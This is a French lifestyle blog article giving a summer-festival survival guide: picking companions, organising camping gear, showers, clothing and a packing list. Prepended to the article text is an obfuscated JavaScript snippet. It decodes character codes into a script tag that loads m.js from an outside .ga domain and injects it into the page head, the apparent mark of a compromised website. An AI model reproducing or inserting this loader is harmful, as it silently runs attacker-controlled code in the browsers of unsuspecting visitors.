Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,111,99,107,46,108,111,118,101,103,114,101,101,110,112,101,110,99,105,108,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})(); FESTIVALS D'ÉTÉ : GUIDE DE SURVIE -

Tu as toujours cherché LE guide de survie pour tes festivals d’été certifié par les festivaliers les plus aguerris. Parce que ça y est, nous y sommes. Le printemps a fait son come back, et il est grand temps pour toi de commencer à réserver tes billets de festival. Rock en Seine, Solidays, Hellfest, We Love Green, Sziget, Glastonbury ou bien Coachella. Après avoir écumé toutes les programmations en espérant trouver tes artistes favoris à l’affiche, c’est bon tu as trouvé le festival qui fait battre ton coeur. Pour profiter pleinement de ces quelques jours de découvertes musicales en toute sérénité, c’est par ici que ça se passe !

1. CHOISIS LA BONNE TEAM

Si tu décides de partir en festival avec ta bande de potes, attention à choisir les bonnes personnes. Tu ne veux clairement pas partager ta tente pendant 1 semaine avec une personne avec laquelle tu n’arrives pas à cohabiter.

Pars avec des gens qui souhaitent vivre leur expérience de festival de la même manière que toi. Aller de scène en scène au tout premier rang pour ne pas rater les artistes trop hype du moment ou alors boire des bières allongé devant les scènes en décuvant de la soirée de la veille, à toi de choisir de quelle team tu veux être.

2. ORGANISE-TOI

Festival = camping = organisation.

Une fois ta bande de potes opérationnelle, pensez ORGANISATION. Qui ramène quoi ? Tentes, matelas gonflables, tapis de sol, sacs à viande, sacs de couchage… La liste est longue mais le camping en festival c’est rude quand tu n’es pas bien équipé.

Et vu que tout le monde a la même tente Quechua en festival, tu peux créer un signe distinctif (fanion, banderole ou autre décor…) et l’accrocher sur ta tente pour pouvoir la retrouver plus facilement et créer une bonne cohésion de groupe avec tes potes.

3. « ON SE LAVE PAS EN FESTIVAL » ?

Souvent, les gens ont peur de devoir faire du camping pour une raison : la peur d’être sale pendant plusieurs jours. Pas de panique, il y a des DOUCHES dans tous les campings de festival. Seul inconvénient, il est préférable de te lever plus tôt que les autres pour ne pas faire la queue et profiter de l’eau encore bien chaude. Ou alors te laver pendant que les grosses têtes d’affiche du festival jouent. C’est toi qui voit. 

Si t’as la flemme de faire la queue pour te laver (ou si les douches sont payantes, oui ça existe) les lingettes nettoyantes pour bébé seront ton meilleur allié.

4. LES FRINGUES DANS TOUT ÇA ?

La règle d’or est de préparer ses vêtements en fonction de la météo annoncée. Tu n’as pas envie de te retrouver en short sous la pluie ni en pull sous une chaleur caniculaire.

Tu n’es pas là pour faire un défilé Victoria Secret’s, donc choisis des fringues qui ne craignent rien (gare à la poussière) et dans lesquels tu te sens à l’aise pour danser jusqu’au bout de la nuit.

Le petit tips : superposer les vêtements pour éviter les allers-retours dans la tente et s’adapter aux changements de température.

5. LES INDISPENSABLES À ABSOLUMENT GLISSER DANS TON SAC

  • lunettes de soleil + crème solaire : le duo incontournable pour éviter de ressembler à une écrevisse
  • des bouchons d’oreille : très efficaces surtout lorsque tu es dans des pays où les normes sonores ne sont pas les mêmes qu’en France (coucou le Sziget Festival à Budapest)
  • une lampe torche : pratique pour pouvoir retrouver ta tente en pleine nuit
  • des médicaments contre le mal de gorge : quand tu perds ta voix dès les premiers jours
  • des pansements : indispensables en cas de pogos plutôt coriaces qui t’écorchent les pieds 
  • une gourde : non seulement c’est éco-friendly mais ça permet de rester hydrater tout au long du festival

Tu es enfin prêt(e) à faire des rencontres inoubliables, vivre des moments incroyables, rire, chanter à en perdre la voix et danser jusqu’à ne plus en pouvoir.

Toutes les chances sont de ton côté pour passer une superbe semaine et éviter les mauvaises expériences.

BON FESTIVAL(S) !

Clique sur l’article sur les festivals à choisir en 2019 ici pour t’aider à déceler la perle rare. 

Et si tu souhaites avoir encore plus de conseils concernant la vie en festival, je t’invite à lire cet article